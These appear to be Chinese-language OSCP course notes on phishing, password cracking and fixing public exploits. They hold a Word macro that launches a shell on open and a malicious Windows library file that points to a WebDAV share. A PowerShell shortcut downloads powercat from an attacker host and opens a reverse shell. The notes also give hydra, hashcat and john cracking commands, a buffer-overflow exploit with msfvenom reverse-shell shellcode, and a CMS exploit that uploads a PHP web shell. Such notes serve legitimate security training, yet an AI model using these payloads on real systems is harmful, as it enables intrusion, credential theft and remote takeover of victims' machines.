# OSCP Day 3 ###### tags: `OSCP` ## Canary Tokens [釣魚連結產生器](https://canarytokens.org/generate#) ## Office巨集 可以把 cmd 換成Reverse Shell mkpsrevshell.py ```Basic Sub AutoOpen() mySub End Sub Sub Document_Open() mySub End Sub Sub mySub() CreateObject("Wscript.Shell").Run "cmd" End Sub ``` ## 濫用Windows多媒體Lib Wsgidav ```bash= pip3 install wsgidav mkdir webdav ~/.local/bin/wsgidav --host-0.0.0.0 \ --port=80 --auth=anonymous --root ~/webdav/ ``` config.Library-ms * 這個東西會變成多媒體資料夾並且連結到我們開的Webdav * 攻擊情境就是把這個檔案傳給目標，然後誘使目標點開裡面的捷徑檔 * 這個檔案被開過後就會被加入\<Serialize>， * 所以傳給目標的檔案要是乾淨的 ```xml= <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://10.7.30.1</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> ``` 開啟一個可以下載powercat.ps1的伺服器 (在放置powercat.ps1的目錄開) ``` python -m http.server 8000 ``` 開啟NC監聽443 ``` nc -nvlp 443 ``` 新增釣魚捷徑放在webdav的資料夾裡 ```bash= powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.7.30.1:8000/powercat.ps1');powercat -c 10.7.30.1 -p 443 -e powershell" ``` ## 密碼爆破 hydra ```bash= hydra -l kali -P pass.txt ssh://127.0.0.1 hydra -l admin -P pass.txt -s 80 -f 10.7.30.22 http-get /secret ``` crackmapexec ``` crackmapexec ssh 127.0.0.1 -u kali -p pass.txt --port 22 ``` ``` crackmapexec rdp 127.0.0.1 -u user -p pass.txt --port 22 ``` ### [scatteredsecret.com](https://scatteredsecrets.com/) 查看密碼是否外洩 ### hashcat ```bash= # get hash echo -n admin | md5sum # hashcat benchmark hashcat -b # get hash type hashid '<hash str>' ``` 產生Hashcat的Rule檔 (下面範例第一行是在字典檔的每個字的後面加"1!"，然後字首大寫，第二行類推。 一行代表一種規則，如果字典檔是N，規則有r，這樣實際運行時會跑N*r個) ```= $1 c $! $1 $2 $3 ``` 實際Crack MD5("Computer123!")=f621b6c9eab51a3e2f4e167fee4c6860 crackme.txt ```= f621b6c9eab51a3e2f4e167fee4c6860 ``` pass3.rule ```= $1 c $! $2 c $! $1 $2 $3 c $! ``` 因為hashcat會跳過爆過的hash, 可以加--force ```= hashcat -r pass3.rule -m 0 crackme.txt /usr/share/wordlists/rockyou.txt --force ``` ### John-the-ripper ```= john --wordlist=note.txt --rules=sshRules ssh.hash ``` ### Keepass 不安全的第三方密碼管理軟體 ```bash= hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule ``` ### ssh rsa file passphrase (ssh2john.py) 先去github下載```ssh2john.py``` ```bash= python ssh2john.py id_rsa > ssh.hash ``` ssh.rule ```= [List.Rules:sshRules] c $1 $3 $7 $! c $1 $3 $7 $@ c $1 $3 $7 $# ``` ```bash= sudo sh -c 'cat ssh.rule >> /etc/john/john.conf' ``` 10.7.30.22/secret/note.txt ```= Windows rickc137 dave superdave megadave umbrella ``` ```bash= john --wordlist=note.txt --rules=sshRules ssh.hash ``` ### linux password ``` /etc/shadow ``` ## Fix Expoits 去github拿Expoit，但是要會改成自己環境的參數 例如有些會掛Porxy，可以拿掉 ### Memory Buffer Over Flow EIP/RIP 暫存器 (儲存下個指令的位置) 原理就是讓記憶體爆掉把 EIP/RIP的位置覆蓋掉 改成自己的攻擊程式位置 \x00在字串中是截斷符號 #### Example: Sync Breeze Enterprise 10.0.28 找弱點利用 ```bash= searchsploit "Sync Breeze Enterprise 10.0.28" # 把Eploit下載到當前目錄 searchsploit -m 42314 ``` 會有個42314.c 可以從```#define``` 觀察他是用Windows編譯的 所以要安裝ming2-64 ``` sudo apt install mingw-64 ``` 開始編譯 ``` i686-w64-mingw32-gcc 42341.c -o 42341.exe ``` 但是發現她會噴錯誤 所以要來Debug Google之後發現要加 -lws2_32 ``` i686-w64-mingw32-gcc 42341.c -o 42341.exe -lws2_32 ``` 之後確認可以正常編譯 接下來要改受害目標的位置與Port ```c=35 printf("[>] Socket created.\n"); server.sin_addr.s_addr = inet_addr("10.7.30.31"); server.sin_family = AF_INET; server.sin_port = htons(80); ``` 接下來改記憶體的Return Address 因為不同的Windwos版本可能用到不同的dll ```c=74 unsigned char retn[] = "\x83\x0c\x09\x10"; //原本是用 \xcb\x75\x52\x73 msvbvm60.dll 這邊改成JUMP ESP ``` 用msfvenom產生c語言的revshell ```bash= msfvenom -p windows/shell_reverse_tcp LHOST=10.7.30.1 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" ``` 把42341.c的payload換掉 但是保留第一行的NOP ```c=76 unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLIDE "\xd9\xc1\xd9\x74\x24\xf4\xbb\x77\xe0\xbf\xaa\x58\x29\xc9\xb1" "\x52\x31\x58\x17\x83\xc0\x04\x03\x2f\xf3\x5d\x5f\x33\x1b\x23" "\xa0\xcb\xdc\x44\x28\x2e\xed\x44\x4e\x3b\x5e\x75\x04\x69\x53" "\xfe\x48\x99\xe0\x72\x45\xae\x41\x38\xb3\x81\x52\x11\x87\x80" "\xd0\x68\xd4\x62\xe8\xa2\x29\x63\x2d\xde\xc0\x31\xe6\x94\x77" "\xa5\x83\xe1\x4b\x4e\xdf\xe4\xcb\xb3\xa8\x07\xfd\x62\xa2\x51" "\xdd\x85\x67\xea\x54\x9d\x64\xd7\x2f\x16\x5e\xa3\xb1\xfe\xae" "\x4c\x1d\x3f\x1f\xbf\x5f\x78\x98\x20\x2a\x70\xda\xdd\x2d\x47" "\xa0\x39\xbb\x53\x02\xc9\x1b\xbf\xb2\x1e\xfd\x34\xb8\xeb\x89" "\x12\xdd\xea\x5e\x29\xd9\x67\x61\xfd\x6b\x33\x46\xd9\x30\xe7" "\xe7\x78\x9d\x46\x17\x9a\x7e\x36\xbd\xd1\x93\x23\xcc\xb8\xfb" "\x80\xfd\x42\xfc\x8e\x76\x31\xce\x11\x2d\xdd\x62\xd9\xeb\x1a" "\x84\xf0\x4c\xb4\x7b\xfb\xac\x9d\xbf\xaf\xfc\xb5\x16\xd0\x96" "\x45\x96\x05\x38\x15\x38\xf6\xf9\xc5\xf8\xa6\x91\x0f\xf7\x99" "\x82\x30\xdd\xb1\x29\xcb\xb6\xb7\xaa\xcd\x47\xa0\xb6\xf1\x46" "\x8b\x3e\x17\x22\xfb\x16\x80\xdb\x62\x33\x5a\x7d\x6a\xe9\x27" "\xbd\xe0\x1e\xd8\x70\x01\x6a\xca\xe5\xe1\x21\xb0\xa0\xfe\x9f" "\xdc\x2f\x6c\x44\x1c\x39\x8d\xd3\x4b\x6e\x63\x2a\x19\x82\xda" "\x84\x3f\x5f\xba\xef\xfb\x84\x7f\xf1\x02\x48\x3b\xd5\x14\x94" "\xc4\x51\x40\x48\x93\x0f\x3e\x2e\x4d\xfe\xe8\xf8\x22\xa8\x7c" "\x7c\x09\x6b\xfa\x81\x44\x1d\xe2\x30\x31\x58\x1d\xfc\xd5\x6c" "\x66\xe0\x45\x92\xbd\xa0\x66\x71\x17\xdd\x0e\x2c\xf2\x5c\x53" "\xcf\x29\xa2\x6a\x4c\xdb\x5b\x89\x4c\xae\x5e\xd5\xca\x43\x13" "\x46\xbf\x63\x80\x67\xea"; ``` 完成後重新編譯 開啟NC的監聽Port 再用wine打開就可以連上了 #### Example CMS 有些網頁服務的版本有漏洞 可以先偵查網頁服務的版本 之後在searchsploit搜尋Expoit ```bash= searchsploit "Made Simple 2.2" ``` 下載Expoit之後要改一些參數 ```python=12 base_url = "https://10.7.30.31/admin" upload_dir = "/uploads" upload_url = base_url.split('/admin')[0] + upload_dir username = "admin" password = "chtcms" ``` 改完之後發現 index out of range錯誤 要改csrf的param ```python=18 csrf_param = "_sk_" txt_filename = 'cmsmsrce.txt' php_filename = 'shell.php' payload = "<?php system($_GET['cmd']);?>" def parse_csrf_token(location): print("location", location) return location.split(csrf_param + "=")[1] ``` 接著再用python2打開就可以用了 如果遇到問題可以用Burp去看每個Request做了甚麼 因為有些題目會改掉弱點 所以說要會看Exploit在做甚麼